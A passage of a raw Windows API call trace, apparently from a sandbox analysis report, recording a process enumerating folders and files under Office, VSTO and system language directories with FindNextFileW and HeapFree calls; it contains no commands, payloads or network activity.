lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0287.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.593] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0287.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.593] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0287.594] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.594] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0287.594] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.594] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0287.594] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.594] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0287.595] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.595] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0287.595] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.595] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0287.595] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.595] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0287.595] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.595] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0287.596] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.596] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0287.596] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.596] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0287.596] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.596] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0287.596] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.597] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0287.597] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.597] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0287.597] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.597] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0287.597] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.597] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0287.598] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.598] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0287.598] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.598] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0287.598] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.598] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0287.599] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.599] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0287.599] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0287.599] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.599] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0287.599] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.599] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0287.599] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.599] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0287.990] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.990] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 0 [0287.990] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0287.990] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.990] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0287.991] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.991] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0287.991] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.991] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0287.997] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.997] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TextConv", cAlternateFileName="")) returned 1 [0287.998] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.998] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0287.998] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0287.998] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.998] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Triedit", cAlternateFileName="")) returned 1 [0287.998] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.998] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0287.998] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0287.998] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.998] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VC", cAlternateFileName="")) returned 1 [0287.999] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.999] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VGX", cAlternateFileName="")) returned 1 [0287.999] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0287.999] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 1 [0287.999] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0287.999] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0287.999] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.999] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0288.000] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0288.018] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 0 [0288.018] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0288.019] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.019] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, 